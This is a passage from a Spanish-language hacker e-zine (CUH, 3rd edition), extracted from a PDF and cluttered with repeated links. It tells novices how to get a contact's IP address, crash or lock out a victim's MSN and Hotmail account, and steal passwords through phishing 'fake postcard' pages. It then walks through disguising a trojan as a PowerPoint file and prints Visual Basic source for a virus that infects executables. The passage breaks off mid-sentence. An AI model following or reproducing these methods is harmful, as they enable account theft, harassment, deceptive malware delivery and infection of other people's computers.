J13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mxhttp://209.85.135.104/search?q=cache:v6BJxMJ13XwJ:foro.el-hacker.com/index.php/topic,112902.0.html+definicion+de+ip+site:foro.el-hacker.com&hl=es&ct=clnk&cd=1&gl=mx
  • 8/14/2019 CUH E-zine 3 Edicion

    13/69

    Hacking Newbie

    Utilidades MSN CUH e-zine 3 EdicionWindows Live MSN link:http://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXEPLUS :

    http://download.msgpluslive.net/setup/MsgPlusLive-422.exeIPGET :

    http://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108Si los links caducan con el tiempo www.softonic.comy www.google.com los encuentran fcilmenteInstalan todo, etc... Para ver el IP Get solo hay que ira los scrips de MSN situados ac:

    En el momento de el envi abrimos el IP Get y nossaldr esto:

    Y listo tendremos el IP de el

    contacto =DOtros mtodos

    Bueno podra estar escribiendo

    mucho tiempo ya que hay muchos

    mtodos, dar algunos ejemplos

    IP CON HOTMAIL.

    Bueno simplemente hagan esto (est

    basado para Windows live Hotmail

    en el antiguo es mas fcil aun, si

    alguien quiere saber como se hace

    que busque en el todopoderoso

    Google) abajo estn los pasos a

    seguir. En otros tipos de correo

    como Yahoo, Gmail etc. no creo

    que sea muy diferente.

    En el punta de los cuadraditos de colores clickean yles sale eso

    Paso 1- Cambiar a versin completa de WindowsLive Hotmail.

    Bueno abrimos la ventana de MSN de

    nuestra victima y le enviamos algo:Paso 2- Abrimos la bandeja de entrada y le damosclic derecho al mail al cual queramos saber el IP dequien lo enviPaso 3- Teniendo el clic derecho apretado, hacer clicen ver cdigo fuente y listo.

    Bueno tambin estn los IP por lanzadores deexploits troyanos etc... Pero no viene al tema.Para este capitulo le agradezco a todos los quepostearon en el foro los diferentes links, y los postde los IP tambin, tambin pongo el link de ing.social dicho mas arriba

    Link: http://foro.el-hacker.com/index.php/topic,61858.0.html

    Post echo por Programar, yo aprend con ese post.Tambin se puede sacar la IP de alguien con accesofsico al computador pero eso depende de cada uno.Sacar IP con acceso fsico con Internet eswww.caulesmiip.comSin Internet inicio>ejecutar>cmd>escribimos ipconfigSi no se puede poner Inicio>panel de control>conexiones Internet, escogen la conexin de Internetque estn usando, le dan al clic derecho entran apropiedades, van a soporte y esta el IP, si nosimplemente con apretar con el clic derecho en laconexin abajo a la izquierda esta el IP.

    Congelar MSN.

    http://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXEhttp://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXEhttp://download.msgpluslive.net/setup/MsgPlusLive-422.exehttp://download.msgpluslive.net/setup/MsgPlusLive-422.exehttp://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108http://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108http://www.softonic.com/http://www.google.com/http://foro.el-hacker.com/index.php/topic,61858.0.htmlhttp://foro.el-hacker.com/index.php/topic,61858.0.htmlhttp://www.caulesmiip.com/http://www.caulesmiip.com/http://www.caulesmiip.com/http://foro.el-hacker.com/index.php/topic,61858.0.htmlhttp://foro.el-hacker.com/index.php/topic,61858.0.htmlhttp://www.google.com/http://www.softonic.com/http://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108http://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108http://download.msgpluslive.net/setup/MsgPlusLive-422.exehttp://download.msgpluslive.net/setup/MsgPlusLive-422.exehttp://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXEhttp://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXE
  • 8/14/2019 CUH E-zine 3 Edicion

    14/69

    Hacking Newbie

    Utilidades MSN CUH e-zine 3 Edicion

    Antes de todo yo les aviso que no estoy de acuerdocon este tipo de actividades.Muchos han escuchado del famoso programacongelador de MSN o tumba MSN ahora har unmanual donde explicare su uso desde 0.Empecemos por saber para que sirve, el programalo que hace es mandar una cantidad muy grande de

    iconos gestuales de MSN hasta que el uso de cpullegue al 99% al llegar a eso el PC de la victima sequeda pegado /colgado (como lo quieran llamar).Bueno explicare paso a paso.Paso 1: Desactivar los iconos gestuales de el MSN(aprietan en su nick >opciones>mensajes>desactivariconos gestuales)Importante: Es muy importante que hagas eso , si noa ti tambin se te quedara pegada la PC , tambinaviso que en el momento de tumbar el MSN de tuvictima tu PC se quedara pegado poraproximadamente unos 40 segundos.

    Paso 2: Abre solamente la ventana de tu victima yabre el congelador de msn

    Y al apretar tumbar MSN, tu PC se quedar pegada40 seg., despus vers que tu victima se desconecto,y entrara de nuevo a msn, y se lo haces de nuevohasta que piense que es un virus xD.Nota: Normalmente los antivirus lo detectan como unVirus. Por qu? Se dice que es por que Microsoft lepago a las casas de Antivirus, ya que nadie ha dado

    con la solucin para esto, piensa que si cada vesque te metes al MSN tienes que reiniciar el PC.Pero les aseguro que no es un virus solo desactivensu Antivirus y listo, yo lo use y no me paso nada si nolo uso ahora es por que no me parece adecuado.LINK DESCARGA DEL PROGRAMA:http://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.html

    Bloquear MSN.Que es un bloqueador de MSN?Un bloqueador de MSN lo que hace es que tuvictima no pueda ingresar a su correo ni a su MSNmientras tengas el programa encendido con solo lanecesidad de tener su cuenta, sin necesidad de elpassword.

    Como lo hace?: Este programa se basa en queHotmail tiene un bloqueo, si uno intenta iniciar sesinmuchas veces tu cuenta queda bloqueada de 1 a 5horas, si tienes el programa encendido lo intentarasiempre y hasta que no lo apagues el/ella no podrentrar.NOTA: Si bloqueaste a alguien y despus de 1 horaentro de nuevo solo cierra el programa y intntalode nuevo. Solamente se puede aplicar si la personaesta desconectada (si esta conectada solo usa elcongelador de mas arriba y en el momento que noeste usas el bloqueador y el no podr ingresar maso por ing. social dile que se salga 10 segundos)Explicare paso a paso el uso del programa.

    Paso 1: Descargamos el programa de:http://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_es

    Paso 2: Lo abrimos y ponemos el mail de tu victima(No puede estar conectada)

    Listo, hasta que no lo saques no tendr ni

    MSN ni Hotmail, si lo usas seguido a la

    misma persona seguramente se terminara por

    crear otra cuenta, espero que no les haga

    problema desconectar a alguien de MSN.

    Nota: Sus AV tambin lo detectaran como

    virus, pero no les pasara nada se los aseguro.

    Hackeo de MSN, las maneras menos complicadaspara newbiesEsto esta echo especialmente para un newbie, y sebasa en hackear a personas con poca experienciaen esto, como la mayora de la gente que usa elcomputador para escuchar musica, navegar, chatear,y usar el office.Empecemos por lo menos complicado que todospueden hacer, los llamados correos fake,generalmente se basan en postales, las cuales uno leenva un correo a alguien en el cual para ver lapostal hay que logearse a msn, las opciones de los

    mejores correos fake o lanzadores de exploits son:

    - Tu email (al cual te llegan las contraseas)-Email falso con el cual le llegar el correo (idealpara poner a alguien conocido de tu victima)- Nombre falso. (Con el cual le llegara el correo)

    http://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.htmlGHJGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGhttp://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.htmlGHJGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGhttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.htmlGHJGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGhttp://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.htmlGHJGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
  • 8/14/2019 CUH E-zine 3 Edicion

    15/69

    Hacking Newbie

    Utilidades MSN CUH e-zine 3 Edicion-Mail verdadero de tu victima.- Mensaje personal que estar en la postal.- Tipo de postal (gusanito, tarjetas bubba, tarjetasNIKO, invitaciones MSN Spaces)-Tipo de correo (Yahoo, Hotmail, Gmail)Listo.

    Tutorial graficoEntramos a nuestra pgina de postales, y ponemoslas opciones,

    Despus si todo salio bien nos saldr esto,(dependiendo se su Pg. de lanzadores)

    Son muy fciles de usar, en el momento de que lavictima quiera leer la postal simplemente laredireccionar a una pgina similar a la de inicio deHotmail en la cual el/ella ingresar sus datos ydespus llegaran a tu bandeja de entrada,(dependiendo de la pgina de donde lo mandaste.)Donde encuentro lanzadores de exploits? (Webdonde ingreso los datos mencionados arriba ymanda la postal)www.google.com , www.cascanolahack.net,www.colombiahack.com etc.Ac tienen una contrasea que me llego, a mibandeja de entrada de mi correo

    Gracias a cascanolahack, por su Pg. de

    lanzadores.Otros mtodosEl famoso keylogger se basa en un programa el cuala travs de conexin cliente/servidor graba todo loque una persona escribe en su teclado ydependiendo del keylogger graba todas las pginas

    Web ingresadas y deja tomar capturas de pantallacada cierto tiempo.

    Ms informacin en:

    Troyanos: http://foro.el-hacker.com/index.php/topic,85484.0.htmlExploits:http://foro.el-hacker.com/index.php/board,85.0.html

    Con mucha imaginacin y con ing. social se puedeconseguir un pass solo es cosa de tiempo.

    Trucos msn posteado por Chavero Cheva:http://foro.el-hacker.com/index.php/topic,14287.0.html

    Bueno le doy las gracias a foro.el-hacker.com ytodos los usuarios y todo el excelente equipo demoderadores del foro, ya que gracias a esacomunidad aprend casi todo lo que se y me enseoa ver muchas cosas de forma diferente.Tambin repito que por opinin personal no estoy deacuerdo con algunas cosas mencionadas aqu, peroal ver en las Pg. que lo ms descargado es esto yque muchos entran a este mundo con intencionescomo estas les dejo esto para que aprendan bien.

    Cualquier duda o [email protected] (solo recibo mails)Saludos RA19

    http://www.google.com/http://www.cascanolahack.net/http://www.colombiahack.com/http://foro.el-hacker.com/index.php/topic,85484.0.htmlhttp://foro.el-hacker.com/index.php/topic,85484.0.htmlhttp://foro.el-hacker.com/index.php/board,85.0.htmlhttp://foro.el-hacker.com/index.php/board,85.0.htmlhttp://foro.el-hacker.com/index.php/topic,14287.0.htmlhttp://foro.el-hacker.com/index.php/topic,14287.0.htmlmailto:[email protected]:[email protected]://foro.el-hacker.com/index.php/topic,14287.0.htmlhttp://foro.el-hacker.com/index.php/topic,14287.0.htmlhttp://foro.el-hacker.com/index.php/board,85.0.htmlhttp://foro.el-hacker.com/index.php/board,85.0.htmlhttp://foro.el-hacker.com/index.php/topic,85484.0.htmlhttp://foro.el-hacker.com/index.php/topic,85484.0.htmlhttp://www.colombiahack.com/http://www.cascanolahack.net/http://www.google.com/
  • 8/14/2019 CUH E-zine 3 Edicion

    16/69

    Troyanos y virus

    de troyanos CUH e-zine 3 EdicionCreacion

    Crear y Encriptar Troyanos By Angelus_7722

    CREAR Y ENCRIPTAR NUESTRO SERVERUna de las preguntas mas comunesal momento de crear y encriptarnuestro server, es como podemos

    engaar a nuestra victima para queno sospeche al momento de abrir nuestroserver.Antes que todo, debemos tener en cuenta que el arteque envuelve a la ingeniera social es muyimportante al momento de tratar de conseguirnuestro cometido, pero no entrar en detalle ya queeste tema se ha tocado en anteriores e-zines.Lo que haremos es maquillar nuestro server paraque no sea tan sospechoso y para ello necesitaremosde las siguientes herramientas:

    Server encriptado Presentacin Power Point (.pps) PowerPoint Slide Show Convert Iexpress MiTeC IconFactory Resoucer Hacker eXeScope

    Utilic una presentacin de Power Point comoarchivo seuelo ya que a todo el mundo le encantaver este tipo de archivos, por esta razn esrecomendable no usar archivos de imgenes debidoa que en el explorador de windows, el msn ycorreos electrnicos, pueden pre visualizarimgenes, generando de esta manera sospechas,debido a que el archivo que estamos enviando es deextensin .exeBueno, lo primero que vamos a hacer es convertirnuestro archivo lo_mejor.pps en lo_mejor.exe, conel fin de poder utilizar el Iexpress como binder.Como todos saben, el Iexpress es una herramientapropia de Windows que podemos utilizar para uniro juntar dos archivos de extensiones .exe en uno solotambin de extensin .exe, convirtindose de estamanera en el binder perfecto, indetectable a los antivirus.Para ello utilizamos un programa llamadoPowerPoint Slide Show Converter, aunque existenmuchos mas que nos sirve para realizar este tipo deconversin.Abrimos Power Point Slide Show Converter:

    Luego veremos el menu principal

    Seleccionamos Simple Mode y veremos lo siguiente

    Ahora solo debemos presionar el botn Make SlideShow para que realice la conversin.Una vez finalizada la conversin presionamos elbotn aceptar.

    Al final veras el resultado de tu presentacin dePower Point, en un archivo aplicativo.

  • 8/14/2019 CUH E-zine 3 Edicion

    17/69

    Troyanos y virus

    de troyanos CUH e-zine 3 EdicionCreacion

    Bueno, lo siguiente que haremos es bindear el serverencriptado (troyano) con lo_mejor.exe (seuelo).

    No entro en detalle sobre la confifuracin ya que lainfo la puedes encontrar en foro.el-hacker.com.El resultado del bindeo es un archivo aplicativo oejecutable como el siguiente:

    Lo siguiente que haremos es buscar el Icono depower point, el cual podremos extraer con unprograma muy bueno llamado MiTeCIconFactory

    Lo siguiente que haremos es abrir el programa yseleccionar open desde File ubicado en el menprincipal.

    Acontinuacion ubicaremos la carpeta de Microsoft

    office para ubicar el icono de Power Point

    Le damos doble clic a POWERPNT.EXE y veremostodos los iconos que maneja dicho programa. Eneste punto debemos seleccionar el icono quedeseamos y el de mayor tamao.

    Lo que haremos ahora es guardar el icono para serutilizado mas adelante.

    El resultado es un archivo con extensin .ico

    El siguiente paso es cambiar el icono de nuestroserver, ya que el que tiene actualmente correspondeal asignado por el IExpress. Para poder hacer el

    cambio utilizamos programa conocidos por todosque es el Resoucer Hacker.

  • 8/14/2019 CUH E-zine 3 Edicion

    18/69

    Troyanos y virus

    Creacion de troyanos CUH e-zine 3 Edicion

    Lo que haremos es seleccionar el archivo al quequeremos cambiarle el icono, siendo en nuestro casoel server que ya bindeamos y que denominamoscomo Archivo_IExpress.exe.

    Una ves seleccionado el archivo procedemoseliminar la carpeta AVI como lo muestra en la figura.

    El siguiente paso consiste en cambiar el icono, asique debes seleccionar la opcin Replace Resource

    Ahora lo que debemos hacer es cambiar el iconoactual por el icono de Power Point, para ello

    oprimimos el botn Open File with new Icon.. yubicamos el archivo POWERPNT_4.ico

    Despus solo debemos oprimir Replace

    Como vern los iconos ya fueron cambiados y soloqueda guardar los cambio con la opcin save as yelegimos guardar sobre el ya existente es decir enArchivo_IExpress.exe.

    Como se darn cuenta, saldr un mensajepreguntando si desean remplazar el archivo, al cual

    debern darle yes. Al final y despus de refrescar laventana donde se encuntra nuestro server, veremosque su icono a cambiado.

  • 8/14/2019 CUH E-zine 3 Edicion

    19/69

    Troyanos y virus

    Creacion de troyanos CUH e-zine 3 Edicion

    Si detallan el archivo podrn ver datos como Win32Cabnet Selft-Extractor y Microsoft Corporation,informacin que levantara sospechas. Para darsolucin a este inconveniente usaremos un programa

    llamado eXeScope

    Lo siguiente que haremos es dar en la X para cerrarel programa, pero antes de que se cierra nos pideconfirmar el cambio del tamao del archivo al cualle daremos aceptar

    Lo que debemos hacer es abrir nuestro server coneste programa.

    Al final obtendremos un archivo mas creble al quedebemos cambiarle el nombre por el original de lapresentacin de Power Point, lo_mejor.

    Ahora lo que haremos es modificar algunos datospara mejorar su aspecto, FileDescription yCompanyName. Lo primero es dar un clic al botnderecho sobre FileDescription, seleccionamos editary escribimos lo que queramos, por ejemplo MicrosoftOffice, lo mismo hacemos con CompanyName, alcual lo cambiaremos por Power Point.

    Aclaro que lo mas importante es la Ingeniera Socialque usemos con nuestras victimas, aunque un pocode ayuda no est mal.

    SaludosAngelus_7722

    Despus de modificarlo veremos algo como

  • 8/14/2019 CUH E-zine 3 Edicion

    20/69

    Exploits

    Conocimiento Basico De Exploits CUH e-zine 3 Edicion

    Conocimiento Basico De Los ExploitsBy SkullMaster123CONOCIMIENTOS BSICOS DE

    LOS EXPLOI TS,VULNERABILIDADES, ETC...

    Saludos, bueno aqu les voy aexplicar conceptos bsicos de los exploits y otrascosas, ya que he visto que muchos users postean estolo otro, pues aqu les dejo ciertas cosas bsicas! Bueno comencemos:

    Qu es un exploit?Los exploits son unas de las muchas maneras deexplotar alguna vulnerabilidad en un sistema, cuyaseguridad puede ser saltada por este.Al hablar de querer explotar un bug tienes que estarprogramado dicho exploit en el lenguajecorrespondiente y sin ningn error en sus lneas,existen formas diferentes de ejecutarlo ya sea local oremota.Exploit tambin viene de la palabra ingles, quesignifica explotar, este en realidad es un cdigomalicioso.

    Qu es una Vulnerabilidad?una vulnerabilidad es una debilidad en losprocedimientos de seguridad, diseo,implementacin o control interno que podra serexplotada (accidental o intencionalmente) y queresulta en una brecha de seguridad o una violacinde la poltica de seguridad de sistemas

    Explotar Forma Local:Este caso nuestro exploit esta en nuestra maquina, aeso se refiere el nombre, Un ejemplo bien visto sobreesta forma de explotar es la shell.

    Explotar Remotamente:En este caso es lo contrario estaramos atacando aalgn servidor que tenga red, esto se realiza a travsde puerto, sean privilegiados o no.

    Puertos Privilegios:Esto son menores que 1024, estos estn reservados alS.O

    Puertos no privilegios:Estos son mayores que 1024.

    Tipos de exploits:Aqu nombrare algunos exploits (Los que meacuerdoXD) su nombre y definicin, algunostambin, solo son vulnerabilidades o bugs:

    Desbordamiento del Buffer:es un error de software que se produce cuando secopia una cantidad de datos sobre un rea que noes lo suficientemente grande para contenerlos,sobrescribiendo de esta manera otras zonas de

    memoria. Como consecuencia, se producir unaexcepcin del acceso a memoria seguido de laterminacin del programa o, si se trata de un usuarioobrando con malas intenciones, la explotacin deuna vulnerabilidad o agujero de seguridad.Describiendo la tcnica:

    Un desbordamiento de buffer ocurre cuando losdatos que se escriben en un buffer corrompenaquellos datos en direcciones de memoriaadyacentes a los destinados para el buffer, debido auna falta de validacin de los datos de entrada

    Cross-site scripting o XSS:Esta es muy conocida, jeje y algunas personas laaprovechan, esto ocurre cuando hay unavulnerabilidad en el HTML o en la validacin de este.Originalmente abarcaba cualquier ataque quepermitiera ejecutar cdigo de "scripting", comoVBScript o javascript, en el contexto de otro dominio.

    Inyeccin SQL:

    Tambin es muy conocida y muy usada estavulnerabilidad, esta ocurre en el nivel de lavalidacin de las entradas a la base de datos de unaaplicacin.El origen es el filtrado incorrecto de las variablesutilizadas en las partes del programa con cdigoSQL. Es, de hecho, un error de una clase msgeneral de vulnerabilidades que puede ocurrir encualquier lenguaje de programacin o de script queest incrustado dentro de otro.(En este caso no seriaun exploit sino una vulnerabilidad)

    Ataque DoS:Es un ataque a un sistema de ordenadores o red quecausa que un servicio o recurso sea inaccesible a los

    http://es.wikipedia.org/wiki/Manejo_de_excepcioneshttp://es.wikipedia.org/wiki/Memoria_de_computadorahttp://es.wikipedia.org/wiki/Crackerhttp://es.wikipedia.org/wiki/Crackerhttp://es.wikipedia.org/wiki/Exploithttp://es.wikipedia.org/wiki/Agujero_de_seguridadhttp://es.wikipedia.org/wiki/Datohttp://es.wikipedia.org/wiki/Direcci%C3%B3n_de_memoriahttp://es.wikipedia.org/w/index.php?title=Validaci%C3%B3n&action=edithttp://es.wikipedia.org/wiki/VBScripthttp://es.wikipedia.org/wiki/Javascripthttp://es.wikipedia.org/wiki/Base_de_datoshttp://es.wikipedia.org/wiki/Lenguaje_de_programaci%C3%B3nhttp://es.wikipedia.org/wiki/Lenguaje_interpretadohttp://es.wikipedia.org/wiki/Ordenadorhttp://es.wikipedia.org/wiki/Redhttp://es.wikipedia.org/wiki/Redhttp://es.wikipedia.org/wiki/Ordenadorhttp://es.wikipedia.org/wiki/Lenguaje_interpretadohttp://es.wikipedia.org/wiki/Lenguaje_de_programaci%C3%B3nhttp://es.wikipedia.org/wiki/Base_de_datoshttp://es.wikipedia.org/wiki/Javascripthttp://es.wikipedia.org/wiki/VBScripthttp://es.wikipedia.org/w/index.php?title=Validaci%C3%B3n&action=edithttp://es.wikipedia.org/wiki/Direcci%C3%B3n_de_memoriahttp://es.wikipedia.org/wiki/Datohttp://es.wikipedia.org/wiki/Agujero_de_seguridadhttp://es.wikipedia.org/wiki/Exploithttp://es.wikipedia.org/wiki/Crackerhttp://es.wikipedia.org/wiki/Crackerhttp://es.wikipedia.org/wiki/Memoria_de_computadorahttp://es.wikipedia.org/wiki/Manejo_de_excepciones
  • 8/14/2019 CUH E-zine 3 Edicion

    21/69

    Exploits

    Conocimiento Basico De Exploits CUH e-zine 3 Edicionusuarios legtimos. Normalmente provoca la prdidade la conectividad de la red por el consumo delancho de banda de la red de la vctima osobrecarga de los recursos computacionales delsistema de la vctima.

    Se genera mediante la saturacin de los puertos conflujo de informacin, haciendo que el servidor se

    sobrecargue y no pueda seguir prestando servicios,por eso se le dice "denegacin".

    ROOT Exploit:Un rootkit es un utilidad que, archivos en formatoexe o bien ejecutables (como quiera llamarse) hansido previamente troyanizados por alguna personaque los program, con el fin de que sta personapueda permanecer indetectable al momento depermanecer en un sistema que va a comprometer.Esto es muy utilizado por aquellas personas que nocuenta con el conocimiento necesario para poderprogramar sus propias herramientas para que losmantengan ocultos. Algunos de estos rootkits puedenllegar a modificar el Kernel, llmese en Windows yLinux.

    Link ROOT Exploit:http://rapidshare.com/files/40261958/rootexploits.rar.html

    Escner de vulnerabilidades:Bueno este es un programa que muchas personasque exploten bugs etc deberan tener este escaneaalgn sitio Web y luego te da un informe de lasvulnerabilidades que tienes (Si es que tiene claro) yluego de vez en cuando te da un link de ese exploit!

    Uno de esos programas es:

    Shadow Security Scanner (O SSS)

    - No basta Solo con Escanear una Pagina Webcon Shadow Security Scanner, Acunetix, uOtro, estos software son de auditoria, dejanun Log, Tremendo en la maquina remota, losadministradores de estos servidores, sisabrn quien escaneo, aunque utilices Proxy.

    Que es un Proxy?el trmino Proxy hace referencia a un programa odispositivo que realiza una accin en representacin

    de otro, en pocas palabras esto oculta tu IP.

    Qu es un Xploit?

    Esto NO es lo mismo que Exploit, un Xploit es unfake mail, Enviar correo electrnico falseando el

    remitente. Se trata de una tcnica muy empleada enIngeniera Social. Para poder obtener contraseas deHotmail, yahoo o cualquier tipo de compaa paralos correos electrnicos.Al Enviar un mail y la victima hacer click este seridereccionaba automticamente al XPLOIT, el cualera una mascara , el Xploit le Peda los datos,exactamente igual como si fuese el Index de Hotmail,

    Pero una vez Puesto, estas contraseas van al Emaildel Atacante, luego de ingresar, les sala un error, ytenan que volver a colocar la contrasea pero estavez, si era el Index de Hotmail, e ingresaban a susCorreos Normalmente.

    Una gran diferencia que se ha de tomar en cuenta!

    Dnde encuentro Exploits?Bueno hay muchas pginas donde descargarlos aqu

    dejo algunas:

    http://www.milw0rm.com/http://www.securityfocus.com/http://www.blacksheepnetworks.com/security/hack/

    Bueno milworm es buena, pero primero para usarexploits tienes que leer muchos, tambin seria buenque supieras lenguaje de programacin en este casoC, ya que es uno de los mas utilizados para losExploits, y bueno leer, leer, leerOtra cosa nunca ejecutes un exploit si no sabes lo

    que hace!

    Bueno creo que este corto manual menciono ciertascosas importantes, hasta donde me acuerdo! Esperoque lo hallan disfrutado y entendido que es muyimportante, bueno un saludo a toda la C.U.H, y si mefalto algo disculpen!!

    Y mis mas sinceras disculpas! ;)

    By-SkullMaster123

    http://es.wikipedia.org/wiki/Ancho_de_bandahttp://es.wikipedia.org/wiki/Servidorhttp://www.milw0rm.com/http://www.securityfocus.com/http://www.blacksheepnetworks.com/security/hack/http://www.blacksheepnetworks.com/security/hack/http://www.securityfocus.com/http://www.milw0rm.com/http://es.wikipedia.org/wiki/Servidorhttp://es.wikipedia.org/wiki/Ancho_de_banda
  • 8/14/2019 CUH E-zine 3 Edicion

    22/69

    Programacion VB

    Infectar Ficheros Ejecutables CUH e-zine 3 Edicion

    Infectar Ficheros Ejecutables En Windows By ANYD00MINFECTAR FICHEROS EJECUTABLES

    Antes que nada me presento, soyANYD00M y les dejo un artculosobre como infectar ficherosejecutables de Windows utilizandoel lenguaje Visual Basic 6.0. El

    siguiente artculo no fue creado confines de inclusin a algn virus aunque as seexponga, y debe ser utilizado solo con fineseducativos y de aprendizaje propio a tu persona. Porende debes hacerte responsable de tus acciones a lahora de utilizar el contenido, no nos comprometa ;-)

    Lo que haremos ser crear una rutina para infectararchivos ejecutables (*.exe) de un sistema utilizandoVisual Basic 6.0. El mtodo que usaremos ser elprepending que se basa en introducir los bits del

    virus sobre los bits del ejecutable original y luegointroducirle una marca para saber si esta infectado ono, normalmente al ejecutable a infectar se lodenomina host y as lo llamaremos nosotros tambin.Seguramente ya abran odo hablar del prepending yabran visto su esquema =P. Mirando el esquema sedarn una idea mas fluida de lo que estamoshablando, veamos los esquemas que nos indicaranlas 3 secuencias por las que pasa el ejecutable al serinfectado.

    1er esquema, el fichero ejecutable en su estado

    original: ---------------------------| HOST |---------------------------

    2do esquema, al fichero se le agregan los bits delvirus:

    ---------------------------| VIRUS |---------------------------| HOST |---------------------------

    3er esquema, se agrega una marca de infectado:---------------------------| VIRUS |

    ---------------------------| HOST |

    ---------------------------| MARCA |---------------------------

    Bueno, quedo un poco feo, pero da una idea de loque estamos hablando. Lo terico es solo esto, y estoes lo nico que tienen que saber, ahora comencemosa programar.

    Primero lo primeroPara comenzar debemos realizar los principios

    bsicos, y comenzamos programando en elForm_Load. Para infectar debemos utilizar una copiadel virus que no se este ejecutando en memoria, sinoal intentar abrirlo el VB nos dar error. El cdigoestar comentado para no tener que cortarlo conexplicaciones:

    Private Sub Form_Load ()'Declaramos las variables que usaremos.Dim Vx As String, PE As String

    'Si nos estbamos ejecutando _

    terminamos la aplicacinIf App.PrevInstance Then End

    'Establecemos a Vx como la ruta completa _del virus.Vx = App.Path & "\" & App.EXEName & ".exe"

    Copiamos el virus y reestablecemos el _valor de la variable.FileCopy Vx, C:\VIRUS.exeVx = C:\VIRUS.exe

    'Establecemos a Pe como la ruta completa _del ejecutable a infectar.Pe = "C:\HOST.exe"

    'Ya tenemos lo que necesitamos, ahora _solo debemos llamar a la Funcion que _infectara el archivo, pasndole como _parmetros la ruta del virus y la del _archivo a infectar (Pe o C:\HOST.exe)Call InfectarFichero(Vx, Pe)End Sub

    Bien, ahora debemos crear la funcin que infectarael fichero (en este caso HOST.exe ubicado en la razC:\). A la Funcin le pasaremos dos parmetros, elprimero ser la ruta completa del virus y el segundo

  • 8/14/2019 CUH E-zine 3 Edicion

    23/69

    Programacion VB

    Infectar Ficheros Ejecutables CUH e-zine 3 Edicionser la ruta completa del fichero a infectar. Lo quehar esta funcin ser abrir de forma binaria elvirus, obtener sus bits y bytes, luego abrir el fichero ainfectar y agregarle los bits al principio y la marca alfinal.Eso fue fcil no?, ahora comencemos con la funcinprincipal:

    Private Function InfectarFichero(Virus As String, HostAs String)'Declaramos variable/sDim Marca As String, BtsHost As String

    'Establecemos la marcaMarca = "HOSTInfectado"

    'Abrimos el fichero para saber si esta infectadoOpen Host For Binary Access Read As #1

    'Obtenemos el tamao en bytes _del ficheroBtsHost = Space(LOF(1))'Obtenemos todo su contenido.Get #1, , BtsHost

    'Cerramos el archivoClose #1

    'Miramos si el archivo ya esta infectadoIf InStr(BtsHost, Marca) 0 Then

    'Si esta infectado salimos.Exit Function

    Else'Sino lo infectamos...

    'Establecemos la variable aqu _ya que si la ponamos al inicio _y no la usbamos, gastbamos _espacio en memoria de gusto.Dim BtsVirus

    'Abrimos de forma binaria el virusOpen Virus For Binary Access Read As #2

    'Obtenemos el tamao (en bytes) usando _la funcin Len(Archivo)BtsVirus = Space(Len(Virus))'Obtenemos los bits...Get #2, , BstVirus

    'Cerramos el archivoClose #2

    'Abrimos el fichero para infectarloOpen Host For Binary Access Write As #3

    'Ponemos los bits del virusPut #3, , BtsVirus'Ponemos los bits del originalPut #3, , BtsHost'Ponemos la marcaPut #3, , Marca

    'cerramosClose #3

    End IfEnd Function

    Muy bien, con esto ya tenemos infectado el fichero.Pero Que pasa si queremos que cuando el usuarioejecute el fichero infectado, para no levantarsospechas se ejecute tambin el ejecutable original?.Para esto deberamos crear otra funcin que cree un

